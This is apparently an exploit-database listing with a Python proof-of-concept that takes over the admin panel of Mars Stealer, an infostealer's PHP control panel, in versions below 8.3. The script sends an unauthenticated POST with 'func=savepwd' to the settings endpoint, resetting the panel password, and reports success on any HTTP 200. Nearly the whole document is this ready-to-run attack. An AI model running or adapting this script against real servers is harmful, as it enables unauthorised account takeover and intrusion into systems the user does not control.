Mars Stealer 8.3 Account Takeover

CVE: N/A
Category: CWE-300
Price: $500
Severity: High
Author: Unknown Author
Risk: High
Exploitation Type: Remote
Date: 2023-04-27


Our sensors found this exploit at:

Below is a copy:

# Exploit Title: Mars Stealer 8.3 - Admin Account Takeover
# Product: Mars Stealer
# Technology: PHP
# Version: < 8.3
# Google Dork: N/A
# Date: 20.04.2023
# Tested on: Linux 
# Author: Skll -

import argparse
import requests

parser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit')
parser.add_argument('-u', '--url', required=True, help='Example: python3 -u http://localhost/')
args = parser.parse_args()

url = args.url.rstrip('/') + '/includes/settingsactions.php'
headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Skll", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US;q=0.8,en;q=0.7"}
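# The request is sent with no session cookie or credentials; "savepwd" sets the panel password to the value of "pwd"
data = {"func": "savepwd", "pwd": "skll"} #change password
response = requests.post(url, headers=headers, data=data)

# HTTP 200 is treated as success; the response body is not checked
if response.status_code == 200:
    print("New Password: " + data["pwd"])
else:
    print("Exploit Failed!")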
